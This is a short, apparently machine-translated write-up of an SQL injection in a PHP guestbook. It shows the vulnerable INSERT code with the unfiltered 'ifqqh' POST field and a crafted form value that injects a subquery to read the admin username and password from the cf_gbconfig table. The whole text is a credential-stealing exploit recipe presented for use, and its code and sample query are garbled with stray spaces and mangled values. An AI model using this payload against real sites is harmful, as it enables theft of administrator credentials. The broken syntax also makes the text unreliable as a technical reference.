Message book injection. Get the account password. Make sure that you know the source code of the program. In insert. Construct another SQL statement. And read the account password. $ Ifqqh = $ _ POST ["ifqqh"]; no filtering ....... $ SQL = "insert into". TABLE_PREFIX. "guestbook (username, email, content, userip, systime, ifshow, ifqqh) values ('". $ username. "','". $ email. "','". $ content. "','". $ userip. "','". $ policime. "',". $ ifshow. ",". $ ifqqh. ")"; $ ifqqh is not included in. Change the value of ifqqh when submitting without the influence of magic_quotes_gpc. Change to <input type = "text" id = "ifqqh" name = "ifqqh" value = "1), (, (SELECT concat (admin_user, 0x2f, admin_pass) FROM cf_gbconfig), "/> so that the SQL insert statement changes. insert into cf_guestbook (username, email, content, userip, systime, ifshow, ifqqh) values ('qqq', ", 'msgmsg ', '2017. 0.0.1 ', '2017-12-22 19:07:23', 2012), (, (SELECT concat (admin_user, 0x2f, admin_pass) FROM cf_gbconfig), 1, now) construct another SQL statement. And read the account password.